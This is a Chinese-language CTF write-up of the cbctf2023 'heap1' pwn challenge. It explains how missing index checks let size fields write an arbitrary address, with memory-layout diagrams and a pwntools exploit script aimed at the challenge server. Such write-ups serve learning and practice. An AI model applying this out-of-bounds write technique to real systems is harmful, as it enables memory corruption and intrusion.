cbctf2023 - heap1

RocketDev

文件属性

属性
Arch x64
RELRO Partial
Canary off
NX on
PIE off
strip yes

解题思路

看似堆题实则根本不是堆题!看了半天myread,也没off-by-null,结果是虚晃一枪

能分配单元的数量由gsizes[31]决定,初始值是0x20,可以通过edit修改,另外还发现除了add函数, 剩下的函数都不检查idx,分配不分配的到指针也不检查,所以可以尝试把目标地址借助size写到gsizes[0]中; 由于没开pie,可以很轻松地写入,唯一的问题是edit需要大小,那么可以通过overlap解决

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
建议使用等宽字体
+------------+
gbuf[0] -> | 0 |
+------------+
gsizes[0] -> | 0 | <- gbuf[0 + 0x20] (以下不再赘述)
+------------+
gsizes[31] -> | 0x20 |
+------------+
##############

|| 修改能分配的单元数量
\/
+------------+
gbuf[0] -> | 0 |
+------------+
gsizes[0] -> | 0 |
+------------+
gsizes[31] -> | 666 |
+------------+
gsizes[32] -> | 0 |
+------------+
target -> | 0 | <- need to be 'Seg_Tree'
+------------+

|| 先给32号单元设置size,方便后面edit
\/
+------------+
gbuf[0] -> | 0 |
+------------+
gsizes[0] -> | 0x410130 | <- assumption
+------------+
gsizes[31] -> | 666 |
+------------+
gsizes[32] -> | 9 |
+------------+
target -> | 0 |
+------------+

|| 接着设置0号单元,将目标地址放在gsizes[0] (gbuf[32]) 上
\/
+------------+
gbuf[0] -> |0x7f..773200| <- assumption (large memory chunk should be alloced near libc(?))
+------------+
gsizes[0] -> | 0x4040c0 |
+------------+
gsizes[31] -> | 666 |
+------------+
gsizes[32] -> | 9 |
+------------+
target -> | 0 |
+------------+

|| 最后edit32号单元,修改目标地址的内容
\/
+------------+
gbuf[0] -> |0x7f..773200|
+------------+
gsizes[0] -> | 0x4040c0 | --+
+------------+ |
gsizes[31] -> | 666 | |
+------------+ |
gsizes[32] -> | 9 | |
+------------+ |
target -> | "Seg_Tree" | <-+
+------------+

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from pwn import *
def payload(lo:int):
if lo:
sh = process('./heap1')
if lo & 0b10:
gdb.attach(sh)
else:
sh = remote("training.0rays.club", 10073)

def add(idx:int, size:int):
sh.recvuntil(b'ice:')
sh.sendline(b'1')
sh.sendline(str(idx).encode())
sh.sendline(str(size).encode())

def edit(idx:int, cont:bytes):
sh.recvuntil(b'ice:')
sh.sendline(b'3')
sh.sendline(str(idx).encode())
sh.sendline(cont)

def Exit():
sh.recvuntil(b'ice:')
sh.sendline(b'5')

add(31, 666)
add(32, 9)
add(0, 0x4040c0)
edit(32, b'Seg_Tree')
Exit()
sh.interactive()
  • 标题: cbctf2023 - heap1
  • 作者: RocketDev
  • 创建于 : 2024-04-22 00:43:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketma.dev/2024/04/21/heap1/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
cbctf2023 - heap1